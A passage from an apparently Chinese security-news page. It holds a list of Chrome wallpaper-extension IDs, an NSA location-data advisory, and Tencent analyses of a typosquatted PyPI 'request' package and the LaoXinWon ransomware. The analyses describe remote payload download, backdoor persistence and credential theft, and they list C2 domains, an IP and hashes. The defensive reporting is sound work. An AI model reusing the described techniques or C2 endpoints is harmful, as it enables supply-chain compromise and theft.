● kdihodbgfndblemlklkllhfjhiidbgih, “Fortnite Wallpaper HD Custom New Tab” ● kefmhdhaebhmdeaabcgoaegmgodncebc, “Just Cause 4 Themes New Tab Avalanche” ● kicmnilchjfefpceoaiopdpbpkicgjjm, “Galaxy Wallpaper HD Custom New Tab” ● kigiheamdfmilbhkfdploghfnndcgkko, “Pokemon Wallpaper HD Custom New Tab” ● kjgceeikbnmddoaggelkkpljdabhghkc, “Pokemon Backgrounds HD” ● kkeojhapoadcdlmkjlakdbhfkldbbmgi, “Hypebeast Wallpapers HD New Tab” ● klblfmpeelmpnadjahhdakiomhaepogb, “Photography Wallpaper HD Custom New Tab” ● kmfiklhdkhidbmofjbgmpeaogglkndpe, “Super Junior Wallpapers & Super Junior Games” ● knacgnmpceaffedmgegknkfcnejjhdpp, “Logan (Wolverine) Wallpaper HD Custom New Tab” ● kppjffaccdlhfeleafnohmfkgimdjmgg, “Darling In The Franxx New Tab HD” ● lbbegfjhlhpikmhbdcfcoadegdldmaen, “Snow Man Wallpapers & Snow Man Games” ● lbjgbekokephmmfllmpglefmoaihklpn, “Made In Abyss Wallpaper HD Custom New Tab” ● lblnngjkgcpplmddebmefokmccpflhip, “Athletes Motivational Quotes Backgrounds” ● lcdabcbanafchdlcbdjgngcplnkijala, “Naruto Wallpaper HD Custom New Tab” ● lcgjhoonomcmjpbnijfohbdhhjmhjlal, “Minecraft Wallpaper HD Custom New Tab” ● ldkienofjncecbbnmhpngiiidekfcdoe, “Bulldogs Themes” ● lemhpidjofhodofghkakoglahdafpcbe, “Harry Potter Wallpaper HD Custom New Tab” ● lgekbdjboenacbkiabfkkcpjgacmjcdg, “Pokemon Go Wallpaper HD Custom New Tab” ● lggmpibegkcnfogpophgnchognofcdgo, “Neon wolf Backgrounds HD” ● ljppknljdefmnkckkdjaokhlncbiehgo, “Roblox Wallpaper HD Custom New Tab” ● lkdahidfbdadmblpkopllegopldfbhge, “Space Wallpaper HD Custom New Tab” ● llngndcpphncgeledehpklbeheadnoan, “3D Wallpaper HD Custom New Tab” ● lmmdoemglmnjenhfcjkhgpkgiedcejmn, “Bangtan Boys Wallpaper HD Custom New Tab” ● lniooknjghghdjoehegcoinmbhdbhcck, “Superheroes Wallpaper HD Custom New Tab” ● makliapgjjpdkkaikobcmdhkfbfcoafk, “3D Wallpaper HD Custom New Tab” ● maohnjppabopdhfkholcdkpehdojnpoc, “Aquarium Live Wallpaper HD Custom New Tab” ● mcadalidfbmnponoamfdjlahdeheommb, “Roblox And Minecraft Wallpaper HD New Tab” ● mcafdholbcjhepgnpfdogaiagjmlfcon, “Sword Art Online Wallpaper HD Custom New Tab” ● meioomnaphfjchjidcfnbadkbaaoanok, “Bears Wallpaper HD Custom New Tab” ● mjbmelinkhpkmbjnocdklkjpiilpikba, “Fortnite Wallpaper HD Custom New Tab” ● mkghdamdheccacmkmnchkaoljoflpoek, “Black Clover Wallpaper HD Custom New Tab” ● mkjcnnfcmmniieaidfadidepdgfppfdj, “Star Wars Wallpaper HD Custom New Tab” ● mmhaojkmpbmgbkojlagnhmjlfmnaglla, “Doctor Who Wallpaper HD Custom New Tab” ● mmlhchoolkdnmnddgmoohigffekjnofo, “Namjin Bts Wallpaper HD Custom New Tab” ● mmmapklofkmbcahafjmiogdbmpagimlp, “Hypebeast Dope Supreme Wallpaper HD New Tab” ● mngcfgonjbdbdbifcbhmdiddloganbcc, “Fireplace Live Wallpaper HD Custom New Tab” ● mnnpffgmgkbdllleeihdgfgleomdhacm, “Satsuriku No Tenshi Wallpaper HD New Tab” ● moalaminambcgbljenplldelnhnaikke, “Rocket League Wallpaper HD Custom New Tab” ● moljhdcbomchgdffhddpicbokacnbjoj, “Moana Wallpaper HD Custom New Tab” ● mpdpjfobafahmgicjmpnfklbphhlacel, “Alfa Romeo Wallpaper HD Custom New Tab” ● mpfleoaldoclbjhfkgbmnelkkbolbegl, “Lion Wallpaper HD Custom New Tab” ● nafbodmhgaabbfchodpkmpnibgjmeeei, “Super Cars – Sports Cars Wallpaper HD New Tab” ● naofchadlleomaipaienfedidkiodamo, “Red Dead Redemption Wallpaper HD New Tab” ● nbbeiofjfjmnicfhkfbjdggbclmbaioc, “League Of Legends (Lol) Wallpaper HD New Tab” ● nbblafbmmogmlhejjondcclcgbkdmjln, “Dinosaurs Wallpaper HD Custom New Tab” ● nbekcbebginchflfegofcjjmojpppnad, “Lilo And Stitch Wallpaper HD Custom New Tab” ● nbhjdcacphemibgeamjkmeknfeffgngk, “Ugandan Knuckles Wallpaper HD Custom New Tab” ● nchffcpkbehklpbdodlakgdbnkdcnpbi, “Hedgehog Wallpaper HD Custom New Tab” ● nckldhnoondmiheikhblobkgcfchcbld, “Blade Runner 2049 Wallpaper HD Custom New Tab” ● ncnonnloajjbpdpgnelmlbflmbhlilid, “Vkook Kim Wallpaper HD Custom New Tab” ● ncpjlhellnlcjnjmablbaingipdemidh, “Bears Wallpaper HD Custom New Tab” ● ndchgkeilnpiefnoagcbnlellpcfmjic, “Death Note Wallpaper HD Custom New Tab” ● ndeejbgcbhehjpjmngniokeleedmjmap, “Daredevil Wallpaper HD Custom New Tab” ● ndihciopmidkbamcfgpdmojcpalolfgo, “Gucci Wallpaper HD Custom New Tab” ● neafafemicnbclhpojeoiemihogeejhl, “Jisung Stray Kids Wallpaper HD Custom New Tab” ● nekimocmhfdimckbgchifahcgafhnagb, “Kill La Kill Wallpaper HD Custom New Tab” ● nenaiblmmandfgaiifppcegejpinkebl, “One Direction Wallpaper HD Custom New Tab” ● neplbnhjlkmpekfcjibdidioejnhejfl, “Chicago Bulls Wallpaper HD Custom New Tab” ● nepnhilmahdmejhghfbjhhabaioioeel, “Ant Man & The Wasp Wallpaper HD New Tab” ● nfanjklinojeimbhmfliomdihldjhfpm, “Jimin & Jungkook Wallpaper HD Custom New Tab” ● nfebelgoldoapjgfkekcmbddpljakakp, “Danganronpa V3 Maki Wallpaper HD New Tab” ● nfhbpopnbgigkljgmelpfncnghjpdopf, “Ad-block for YouTube – Youtube Ad-blocker Pro” ● nfpnclghflfcgkgdjcbpoljlafndbomk, “Seattle Seahawks Wallpaper HD Custom New Tab” ● ngaccohdjpkgnghichikgcpfagnoeeim, “Adidas Wallpaper HD Custom New Tab” ● ngajighkghnbfnleddljedblnjaggebo, “Real Madrid Wallpaper HD Custom New Tab” ● ngchnhjdpgpkapghgpncmommhelegfbh, “Kpop Nu Est Wallpaper HD Custom New Tab” ● ngeofnobniohmdmdkliflkeppfgbjpgn, “Satsuriku No Tenshi Wallpaper HD New Tab” ● nglggaejaflihehbajhppedepephbfae, “Kingdom Hearts 3 Wallpaper HD Custom New Tab” ● nhnemamgicdjigoedllaicngcfihkmhf, “Voltron Wallpaper HD Custom New Tab” ● nhneoegahiihkkgdindfdnobhhhlpfnm, “One Piece Anime Wallpaper HD Custom New Tab” ● njablodeioakdgahodegclphmnbaphin, “Fruits Basket Wallpaper HD Custom New Tab” ● njdegihoinoiplfpbcckmjahlnpeipii, “Godzilla Wallpaper HD Custom New Tab” ● njliieipbkencklladfemkkipmfcjiom, “Dope Wallpaper HD Custom New Tab” ● nklckhbegicdajpehmmpbnpelkdjmdoc, “Ikon Wallpaper HD Custom New Tab” ● nkopnpaipcceikcmfcjlacgkjoglodag, “Devil May Cry Wallpaper HD Custom New Tab” ● nldffbaphciaaophmdnikgkengbmigli, “Final Fantasy Wallpaper HD Custom New Tab” ● nmkfcjaghjoedelgkomoifnpdejjpcbj, “Heart Wallpaper HD Custom New Tab” ● nmlmdkblidkckbhidgfgghajlkgjijkp, “Hawaii Wallpaper HD Custom New Tab” ● nnceiipjfkdobpenbmnajbkdfiklajgl, “Puppies Wallpaper HD Custom New Tab” ● noiinnecebffnjggilfhailhhgdilbld, “One Direction – 1D Wallpaper HD New Tab” ● nojmjafalbmmoohpmjphalepmfnmhfao, “Vmin Bts Wallpaper HD Custom New Tab” ● npcndkopgafkjggOLEDlgfblodppnckj, “Kill La Kill Wallpaper HD Custom New Tab” ● nphiadicgehlpbniemnkhinphngoeaeg, “Red Dead Redemption Wallpaper HD New Tab” ● oaihijkoodmmaibfhojdinffpinmhdji, “Attack On Titan Wallpaper HD Custom New Tab” ● oanlnaeipdakcmafockfiekhdklfidjb, “Chicago Bulls Wallpaper HD Custom New Tab” ● oanplobhgngkpkpeihcdojkongpiheci, “Destiny 2 Wallpaper HD Custom New Tab” ● obahibdkmhmnenkcdpakilchcppihopl, “Clash Royale Wallpaper HD Custom New Tab” ● obgdpcjbebcaphmigjhogcikejnlbjgl, “Deadpool Wallpaper HD Custom New Tab” ● ocfpmgbbkjeblbhdehminjdjffhcidbi, “Dank Memes Wallpaper HD Custom New Tab” ● ocgfhclcahimdhfjgmakmfdnhomofljo, “Bts Wallpaper HD Custom New Tab” ● ocponkhpfikgnggeflddgkfcmhjejedo, “Chevrolet Corvette Wallpaper HD New Tab” ● odoenahafpbigcelejhbkkhnjfleanok, “Lamborghini Super Cars Wallpaper HD New Tab” ● oehamnhnpejphgpkgnenefolepinadjj, “Fortnite Drift Wallpaper HD Custom New Tab” ● oejbnchocabaoicconfnbjghebmbfemc, “Rocky Paw Mighty Pups Wallpaper HD New Tab” ● oejmcobpfiiladgbfpknibppfnekbolo, “Yeezy Wallpaper HD Custom New Tab” ● oemkcngaaomgokaclafmkcgcpbfelmnb, “Wild Animals 3D Neon Wallpaper HD New Tab” ● ofbfieekadnmifbaoigkcffobkkjblep, “Cherry Blossom Wallpaper HD Custom New Tab” ● ofgihclaiecmjbfjnajjimdbjnbiimkk, “Audi R8 Wallpaper HD Custom New Tab” ● ofkjndegefemablfmefngnpchlhapdmi, “Art Wallpaper HD Custom New Tab” ● ofockibbbgfclddbpbhhohdldgkomhgm, “Custom Super Cars Wallpaper HD Custom New Tab” ● ogegpnamjdpcadpldhijjlhkicgbnkjj, “Louis Vuitton Wallpaper HD Custom New Tab” ● ogiaghccmoklogdlbchapejmjnnlichn, “Japan Wallpaper HD Custom New Tab” ● ohjoklkmollkbcibgddolpmpgaoophfl, “One Direction Wallpaper HD Custom New Tab” ● ohobkendnpiijpeiaimjbannfcmhaogi, “Deathstroke Wallpaper HD Custom New Tab” ● ohoingjkmkkoffkdmbpipdncbkhaaefd, “Dachshund Wallpaper HD Custom New Tab” ● oihecidjnjpjfeefkambkjgebbmpahgn, “Dc Comics Shazam Wallpaper HD Custom New Tab” ● oilikkahlcnchaipbojfgejapechblbl, “Santa Claus Christmas Wallpaper HD New Tab” ● ojfjgkolegfhneacbgcjaoajfgcfoapf, “Halloween Wallpaper HD Custom New Tab” ● ojhlagjgjbjfgllocdhlpnkbdlcipnmo, “Cars” ● ojmpgbcmiimbkmjfgmcneplkneleehcc, “God Of War 2018 Wallpaper HD Custom New Tab” ● ojnlggfhmoioajgmnelfdpjojaeknjog, “The Incredibles 2 Wallpaper HD Custom New Tab” ● okgnpdnekilbcgcfeheanbpbhnhmopfc, “Yeezy Wallpaper HD Custom New Tab” ● okjdiicjoeloipmgdopdmhpebnnfadih, “Sao Alicization Wallpaper HD Custom New Tab” ● okphhehkikoonipdjmhglcmlgccjcblp, “Los Angeles Lakers Wallpaper HD New Tab” ● olochidfgadpdbdmdfbhgimiffnllaij, “Dragon Ball Super Wallpaper HD Custom New Tab” ● ombenndgcnmcnfohnbbjcmbmfmpefojc, “Panda Wallpaper HD Custom New Tab” ● omclahaofiigfggelbcleagcphjhabmp, “Fallout 76 Wallpaper HD Custom New Tab” ● onjjlcdmafgcjdbhmlnpmheobbfeilah, “Lego Wallpaper HD Custom New Tab” ● onnmfhejbikffoenamcfglpjnmmbkdeg, “Daredevil Wallpaper HD Custom New Tab” ● oonheecobachpkogdjjnemiipogpgnmg, “The Vampire Diaries Wallpaper HD New Tab” ● opbobdfddmiemhekjiglckcenhpfdbjm, “Hulk Wallpaper HD Custom New Tab” ● opjpfngjbdmgkilopbnapbkbngedcpmj, “Bap Kpop Wallpaper HD Custom New Tab” ● oplhjpchbbngmpgcpjcbijhfehbhodgi, “Rwby Wallpaper HD Custom New Tab” ● oppbpkjmehgijcpeddkpbadoidfpcblg, “Live Christmas Snowfall Wallpaper HD New Tab” ● paddichbcfehpelokpidnagccddbpkin, “Tesla Wallpaper HD Custom New Tab” ● pajbempmgmalnfpbnpclkelnhfccikal, “Bts Bangtan Boys Wallpaper HD Custom New Tab” ● pboddlnfegdnifbhepjegnokocjpadpd, “Kawaii Wallpaper HD Custom New Tab” ● pcbpmbmpjjibcmodpaomahiokikjomgc, “Boston Terrier Wallpaper HD Custom New Tab” ● pcembleiffdccjkcebaodmhgkopipdan, “Ultra Instinct Goku Wallpaper HD New Tab” ● pcgcmplcfdfkkkmaggghdghnlddkpbbo, “DBS and Dragon Ball Super” ● pdhibfagbndnidgfjkhdhlfibdoofbji, “Bmw Wallpaper HD Custom New Tab” ● pdloaiifhmlbhhppajjmfpijopfeenoo, “Bentley Wallpaper HD Custom New Tab” ● pehnljkefahmlhifockljagcfcpljclc, “Gothic Wallpaper HD Custom New Tab” ● pelnnoacfeaanpmnmacjjnnpgfggekig, “V & Jimin Wallpaper HD Custom New Tab” ● pfekelemlpmelhipncgddloaflehglmb, “Tiger Wallpaper HD Custom New Tab” ● pfepcffcdodcancalckiencamnonoebl, “Momo Twice Wallpaper HD Custom New Tab” ● pfpgpbfndacjjjdlgefggndhionakfmb, “Lilo And Stitch Wallpaper HD Custom New Tab” ● pghkmhmjldklacabcgkaaboikfaaogmi, “Kpop Big Bang Wallpaper HD Custom New Tab” ● pgilbgknfcnjjblfnjojmcpkggipblci, “Clash Of Clans Wallpaper HD Custom New Tab” ● pgleokbigapafgjodffamlhdkhiagdgb, “Bmw Wallpaper HD Custom New Tab” ● phkafpikdokjpogdhjpkcgfjpfgnlgeo, “Hulk Wallpaper HD Custom New Tab” ● phmogllmicehmpglfobbihoelfidjnpd, “Carolina Panthers Wallpaper HD Custom New Tab” ● pihogmfmhefemijkgmbimkngninbkkce, “J-Hope Wallpaper HD Custom New Tab” ● pilmbpeapchjcnldfomimmcfoigoenoc, “Emoji Unicorn Wallpaper HD Custom New Tab” ● pinfndnjmdocmimbeonilpahdaldopjc, “Assassination Classroom Wallpaper HD New Tab” ● pinkcaefpkjpljfflabpkcgbkpbomdfk, “Forest Wallpaper HD Custom New Tab” ● pjabdohmcokffcednbgpeoifpdbfgfbj, “Cool Fortnite Wallpaper HD Custom New Tab” ● pjjmcpmjocebmjmhdclbiheoideefiad, “Harry Potter Wallpaper HD Custom New Tab” ● plcdglhlbmlnfoghfhmbhehapfadedod, “Code Geass Wallpaper HD Custom New Tab” ● pmdakkjbaeioodmomlmnklahihodjcjk, “Kpop Red Velvet Wallpaper HD Custom New Tab” ● pmnpldnflfopbhndkjndecojdpgecckf, “Mac Wallpaper HD Custom New Tab” ● pnamonkagicmlnalnlcdaoeenhlgdklf, “Fortnite Skull Trooper Wallpaper HD New Tab” ● poeokidblnamjkagggonidcigafaobki, “Kakashi Hatake Wallpaper HD Custom New Tab” ● pofffhlknjbjolmfoeagdmbbdbjjmeki, “Bts Wallpaper HD Custom New Tab” ● polgnkadhhhmlahkhhbicledbpklnake, “James Harden Wallpaper HD Custom New Tab” ● ppicajcmopaimnnikbafgknffbdmomfk, “Muscle Cars Wallpaper HD Custom New Tab” ● ppmbiomgjfenipmnjiiaemcaboaeljil, “Forntine Battle Ground Wallpaper HD New Tab”     (稿件与封面来源:cnBeta。)

NSA 向雇员发出谨慎启用位置数据的安全风险提示

为消除任何形式的信息泄露和安全风险,美国国家安全局(NSA)已将向雇员发出了“不应在其移动设备和其它小工具上启用位置数据”的提示。《华尔街日报》指出,NSA 希望雇员不要打开移动设备的定位服务,因其或被用于移动追踪和提供对敏感数据的访问。该机构甚至希望雇员关闭追踪已丢失设备的查找服务,同时必须禁用已安装应用的位置数据和广告权限,且不建议在网上浏览和分享位置信息。 NSA 内部指南写道:使用移动设备 —— 甚至仅仅是打开设备的电源 —— 都有暴露位置数据的风险。 移动设备对蜂窝网络和通讯服务提供商有着天生的依赖,并且会在每次连接网络时报送实时位置信息,这意味着服务提供商可以对用户展开大范围的追踪。 在某些情况下,比如 911 通话,此功能或许可以帮助挽救生命。但对位置信息敏感的人员来说,如果攻击者以某种方式影响或控制服务提供商,反而会招致不必要的风险。 除了智能手机,NSA 还警告对任何可提供位置数据的设备严加审视,比如智能手表。因为在任何地方发送和接收的无线信号,都会产生与移动设备类似的位置泄露风险。 当然,这并不是 NSA 首次对现代设备的定位技术产生日益增加的风险顾虑。过去两年,美国国防部就禁止员工使用任何具有位置追踪功能的设备,包括智能手机、智能手表、以及健身手环等。 有鉴于此,NAA 给出了最佳的安全风险控制建议 —— 在不使用设备的时候,最好将它们切换到飞行模式。     (稿件与封面来源:cnBeta。)

PyPI 官方仓库遭 request 恶意包投毒,腾讯安全提供全面解决方案

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ     腾讯洋葱反入侵系统检测发现PyPI官方仓库被恶意上传了request 钓鱼包,攻击者通过钓鱼包实施窃取用户敏感信息及数字货币密钥、种植持久化后门、远程控制等一系列攻击活动。腾讯安全威胁情报中心回溯本次软件供应链攻击事件,发现已有部分用户中招。 一、概述 8月5日,腾讯洋葱反入侵系统检测发现PyPI官方仓库被恶意上传了request 钓鱼包,攻击者通过钓鱼包实施窃取用户敏感信息及数字货币密钥、种植持久化后门、远程控制等一系列攻击活动。腾讯安全威胁情报中心回溯本次软件供应链攻击事件,发现已有部分用户中招。 当用户在安装requests包时,容易将名字打错为 request,结果会使用pip安装成request恶意包。由于requests库非常流行,下载量大,已有部分用户因错误输入包名而被感染。 由于国内开源镜像站均同步于PyPI官方仓库,所以该问题不仅会通过官方仓库,还可能通过各个开源镜像站影响更大范围。腾讯安全应急响应中心(TSRC)建议各开源镜像站以及对开源镜像站有依赖的公司尽快自查处理,确保清除恶意库,保障用户系统安全。 腾讯安全威胁情报中心已针对本次软件供应链攻击展开应急响应,腾讯安全系列产品均已上线对request恶意包的检测和拦截,具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)request恶意包相关IOCs已入库。 腾讯安全威胁情报相关产品均可检测此风险,更多产品信息,可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)request恶意包相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)request恶意包相关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)腾讯主机安全系统已支持查杀利用request恶意包感染的恶意后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全、腾讯安全漏洞扫描服务等产品的数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用request恶意包相关联的IOCs已支持识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、事件分析  (报告来源:腾讯安全应急响应中心) 7月31号,攻击者在PyPI官方仓库上传了request 恶意包,该恶意包通过伪造著名python库requests包名来进行钓鱼,攻击者可对受感染的主机进行入侵,并实施窃取用户敏感信息及数字货币密钥、种植持久化后门、远程控制等一系列活动。 恶意包感染过程: 用户安装 根据用户习惯,在安装requests包,容易将名字打错为 request,结果是使用pip安装成恶意包。 pip install requests –>  pip install request 由于requests库非常流行,下载量大,已有部分开发人员因错误输入包名而被感染。 远程下载恶意代码 在pip安装request包的机制中,会主动执行包中的setup.py文件,在setup.py文件中包含攻击者远程下载并执行恶意代码的逻辑,同时对C2域名进行编码混淆,解密后的C2地址为:https://dexy.top/request/check.so 释放远控木马并持久化 request包安装过程中远程加载的恶意代码包括两部分功能: 释放远控木马到当前用户 HOME 目录的 .uds 文件夹内,木马名称为_err.log(例如 /root/.uds/_err.log)。_err.log远控木马脚本内容经过base64编码和压缩,缩小了体积,同时增强了对抗性。   将远控木马脚本解密后,部分代码内容如下:   远控木马功能齐全,包括命令执行,文件上传下载,python代码执行,信息收集,文件搜索等功能。   在 .bashrc 植入恶意后门命令实现持久化 下发窃密指令 相关IoC:攻击者通过远控木马下发python窃密指令,盗取敏感信息(coinbase帐密)。进程监控如下:   将窃密指令解密后,功能为请求C2 服务:http://dexy.top/x.pyx ,远程加载窃密木马。   远程加载的窃密木马部分功能如下所示,用于窃取浏览器中的cookie,虚拟货币(coinbase)账号与密码等。 三、腾讯安全解决方案: 1.腾讯安全专家建议各开源镜像站以及对开源镜像站有依赖的公司尽快自查处理,确保清除request恶意库; 使用”pip show –file request”进行查看(python3使用”pip3 show –file request”),如果结果为”WARNING: Package(s) not found: request”不存在风险。 如果已经安装,请使用”pip uninstall request”进行卸载,建议Linux系统管理员参考以上详细分析报告指引手动完成已安装后门程序的清除。 2.腾讯安全全系列产品已针对本次供应链攻击展开应急响应: 1)    腾讯安全威胁情报已支持request恶意包相关IOCs的检测; 2)    腾讯T-Sec主机安全(云镜)支持检测清除request恶意包: 3)    腾讯T-Sec高级威胁检测系统(腾讯御界)支持检测request恶意包投毒攻击 IOCs 域名: dexy.top who.dexy.top:3500 ip: 199.247.5.158 url:  hxxp://dexy.top/request/check.so hxxp://dexy.top/x.pyx 参考链接: 【安全通知】PyPI 官方仓库遭遇request恶意包投毒 https://mp.weixin.qq.com/s/dkPdXfGfSK097GI6Ln92lA

LaoXinWon 携带两个勒索病毒样本,重复加密或增加解密难度

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/IkPC_bmZPclVM1Cs2PmyXw   腾讯安全威胁情报中心检测到ID为LaoXinWon的勒索病毒攻击者在国内活跃,攻击者疑通过弱口令爆破方式投递勒索病毒。该攻击者同时携带2款勒索病毒样本,一款为C#编写的勒索模块,加密添加.aes扩展后缀。另一款为Delphi编写的Scarab勒索模块,加密添加.lampar扩展后缀。 一、概述 腾讯安全威胁情报中心检测到ID为LaoXinWon的勒索病毒攻击者在国内活跃,攻击者疑通过弱口令爆破方式投递勒索病毒。不同以往的单一家族勒索攻击案例,经溯源后我们发现该攻击者同时携带2款勒索病毒样本,一款为C#编写的勒索模块,加密添加.aes扩展后缀。另一款为Delphi编写的Scarab勒索模块,加密添加.lampar扩展后缀。两款病毒均无法解密,重复加密更是增加了解密难度。腾讯安全专家提醒企业注意防范,腾讯T-Sec终端安全管理系统与腾讯电脑管家均可查杀拦截此病毒。 攻击者同时携带了内网共享资源探测工具和进程对抗工具,在加密完成之后,还会清空系统日志,以隐藏入侵痕迹。系统中招后的勒索信息均要求受害者联系邮箱LaoXinWon@protonmail.com购买解密工具。 在勒索病毒攻击加密范围不断扩大,加密方式越发变态的勒索攻击现状下,攻击者携带两款勒索模块可避免单一病毒易被安全策略拦截的风险。同时,攻击者存在重复使用2款勒索病毒对受害者文件进行重复加密的情况,进一步增加了文件解密恢复的难度,受害用户即使支付赎金也可能难以挽回损失。腾讯安全系列产品已全面支持检测、拦截LaoxinWon投放的勒索病毒攻击,详细清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)LaoXinWon勒索相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)LaoXinWon勒索相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)LaoXinWon勒索网络相关联的IOCs已支持识别检测; 2)支持检测拦截LaoXinWon发起的爆破攻击行为。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持查杀LaoXinWon相关联的利用模块,勒索模块 2)云镜已支持检测拦截LaoXinWon发起的爆破攻击行为 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)LaoXinWon相关联的IOCs已支持识别检测; 2)LaoXinWon发起的爆破攻击行为已支持检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)企业终端管理系统可查杀LaoXinWon相关联的利用模块,勒索模块; 2)企业终端管理系统已支持检测拦截恶意爆破攻击行为。 3)企业终端管理系统可对系统内高危漏洞进行一键修复 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 腾讯安全威胁情报中心对受害电脑进行溯源分析,发现攻击者主要携带了以下5个功能模块,其中包含了2个勒索加密病毒,分别由C#和Delphi编写。1个日志清理工具,1个进程管理工具,1个局域网探测工具。 其中Lao.exe为勒索模块,该模块由C#编写,运行后会探测局域网内其它共享资源路径,同时获取本地磁盘分区根路径,以便后续对这些位置的资源进行加密。 病毒加密前会排除一些非系统数据类型格式的文件类型,添加.AES加密扩展后缀。 对文件内容的加密过程使用AES算法,AES密钥使用强随机的方式生成。 文件内容加密完成后,AES密钥信息则会使用硬编码的RSA 2048进一步进行加密,后存放于文件尾部,硬编码RSA公钥信息如下: 文件加密完成后被添加.aes扩展后缀,留下勒索信要求联系指定邮箱LaoXinWon@protonmail.com购买解密工具。 laoxinwon.exe同样是一个由Delphi编写的勒索加密模块,运行后首先从内存中解压出大量要使用的勒索关键明文字串(硬编码公钥,加密后缀,勒索信等)信息,经分析研判确认为Scarab勒索家族系列。 今年5月份,腾讯安全威胁情报中心发现国内Scarab勒索家族cov19变种活跃,该家族同样使用较复杂的RSA+AES的加密流程,细节流程如下,该家族同样无法解密。 详细分析报告可参考:《加密文件增加.Cov19扩展名,FushenKingdee勒索病毒正在活跃》 Scarab勒索家族的最新变种同此前分析过的cov19系列勒索一样,会同时加密文件名和文件内容,添加加密扩展后缀.lampar,勒索者的留下的勒索信件联系邮箱依然为LaoXinWon@protonmail.com,同前C#版本的勒索病毒购买联系人信息一致。 同时攻击者还携带了NetworkShare_pre2.exe,该恶意文件的目的为扫描探测内网可攻击的共享资源,proc.exe则为Process Hacker 安装包,主要用于失陷机器内进程上的安全对抗。 CleanExit.exe主要功能为清理Windows系统日志,攻击者在加密攻击完成后,通常会使用该工具清理系统日志,以隐藏其失陷机器的入侵痕迹。在以往发现的真实案例中,我们也看到内网失陷机作为攻击中转机频繁扫描其它内网资产的过程中,攻击者会使用定时任务的形式不断执行系统日志清理程序,从而隐藏其攻击痕迹。 三、安全建议 企业用户: 1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、建议终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码。 7、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 8、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5 6fba83749c63118f62282f479d18e22a 0d2d97c53b98bcf4a3843e94f4ca6b26 参考文章 《加密文件增加.Cov19扩展名,FushenKingdee勒索病毒正在活跃》    

Twitter 涉嫌滥用数据被 FTC 调查:或面临 2.5 亿美元罚款

